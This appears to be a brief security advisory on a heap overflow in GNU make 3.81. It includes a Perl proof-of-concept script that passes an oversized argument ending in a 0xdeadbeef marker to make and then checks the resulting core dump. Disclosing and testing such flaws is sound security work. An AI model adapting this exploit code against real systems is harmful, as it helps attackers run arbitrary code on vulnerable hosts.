GNU Make Pointer Dereference Heap Overflow Vulnerability
Affected Systems:
GNU make 3.81
Description:
--------------------------------------------------------------------------------
Bugtraq id: 68896
GNU Make is a utility that automatically creates executable programs and libraries based on source code.
A heap overflow vulnerability exists in Make 3.81 and other versions. Attackers can exploit this vulnerability to execute arbitrary code in the context of the affected application.
<* Source: HyP *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
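#!/usr/bin/perl
use 5.010;
use strict;
use warnings;
use Time::HiRes qw(sleep);   # the built-in sleep truncates 0.5 to 0

say "Please set ulimit value to 1000 before (ulimit -c 1000)";
sleep 0.5;
# 4096 bytes of filler followed by a 4-byte marker (0xdeadbeef, little-endian)
my $buff = "A" x 4096;
my $addr = "\xef\xbe\xad\xde";
my $make = "./make";
my $gdb = "gdb --core ";
# Build the oversized argument and pass it to the local make binary
my $PAYLOAD = (`perl -e 'print "$buff" . "$addr"'`);
my $exec = qx($make $PAYLOAD);
say "Reading Core file GDB";
sleep 0.5;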
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
GNU
---
The vendor has not yet provided a patch or upgrade. Users of this software should watch the vendor's homepage for the latest version:
http://www.gnu.org